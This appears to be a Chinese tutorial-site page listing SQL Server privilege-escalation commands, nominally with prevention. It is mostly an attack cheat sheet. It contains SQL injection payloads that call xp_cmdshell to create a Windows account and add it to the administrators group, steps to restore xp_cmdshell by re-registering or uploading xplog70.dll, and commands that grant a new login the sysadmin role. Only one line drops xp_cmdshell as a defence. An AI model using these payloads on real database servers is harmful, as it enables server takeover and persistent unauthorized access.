当前位置: 首页 > 图文教程 > 数据库 > MSSQL > SQL Server提升权限相关命令及防范

MSSQL
SQL Server 2000企业版安装教程
存储过程入门与提高
SQL Server 2000安装和基本框架
关于SQL Server的若干注意事项
数据库菜鸟不可不看 简单SQL语句小结
浅谈数据库设计技巧(上)
浅谈数据库设计技巧(下)
Oracle PL/SQL入门之案例实践
新手入门 Windows下Oracle安装图解
oracle架构的基础知识(入门级)
数据库正规化和设计技巧(2)
数据库正规化和设计技巧(3)
使用MS SQL7的LINKED SERVER第一篇
使用MS SQL7的LINKED SERVER第二篇
使用MS SQL7的LINKED SERVER第三篇
使用MS SQL7的LINKED SERVER第四篇
数据仓库的概念
Oracle 8 的函数介绍
从一个MysqL的例子来学习查询语句
SQL中DATALENGTH 用法

MSSQL 中的 SQL Server提升权限相关命令及防范


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-30   浏览: 140 ::
收藏到网摘: n/a

;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"


DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin